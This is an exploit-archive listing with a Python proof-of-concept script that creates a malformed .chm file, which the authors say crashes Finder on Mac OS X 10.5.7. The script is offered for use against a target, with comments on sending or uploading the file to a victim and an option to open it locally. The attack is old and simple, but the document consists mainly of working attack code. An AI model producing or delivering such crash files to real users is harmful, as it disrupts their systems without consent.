Mac OS X 10.5.7 (.CHM File) Local Finder.app Denial of Service Exploit

2009-08-07T00:00:00
ID 1337DAY-ID-6958
Type zdt
Reporter Dr_IDE
Modified 2009-08-07T00:00:00

Description

Exploit for unknown platform in category dos / poc

                                        
                                            ======================================================================
Mac OS X 10.5.7 (.CHM File) Local Finder.app Denial of Service Exploit
======================================================================


#!/usr/bin/env python

import os;

print """
###############################################################################
#									      #
# Mac OS X 10.5.7 Local Finder.app DoS (.CHM)		                      #
# By: Dr_IDE and s0kket						    	      #
# Greets to offsec                                                            #
# Tested on OS X 10.5.7 (This will most likely kill more than this version.   #
#      									      #
###############################################################################
\n""";

fname = (raw_input(" [*] Enter the filename you would like to create:"));
print " [*] Creating Evil .CHM file...";

try:
	f1 = open(fname + '.chm','w');
	f1.write("#################################################\n");
	f1.write("#                                               #\n");
	f1.write("# OSX 10.5.7(X?) Local Finder.app DoS (.CHM)    #\n");
	f1.write("# By: Dr_IDE and s0kket.                        #\n");          
	f1.write("# Greets to offsec.                             #\n");
	f1.write("# It really shouldn't be this easy...           #\n");
	f1.write("#                                               #\n");
	f1.write("#################################################\n\n");
	f1.close();

	print " [*] Payload has been created.";
	print " [*] If the user opens the payload with Finder they won't be happy.";

	#
	# There are two options for this attack:
	# 1.) You can choose to automagically open the chm finder. 
	# As long as a VMware/Parallels isn't installed then finder is 
	# the default app for this extension.
	#
	# 2.) We will just create file and send it/upload it to the target. 
	#
	# Note: Only uncomment one of these lines at a time.
	#
	
	# This will mess up the system pretty bad, only way out is 
	# reboot or force quit of Finder.app
	#x = os.system('open ' + fname + '.chm');
	
	# This will create the offending .chm file and quit.
	x = raw_input(" [*] Press Enter to Quit.");

except:
	print "Error."




#  0day.today [2018-04-04]  #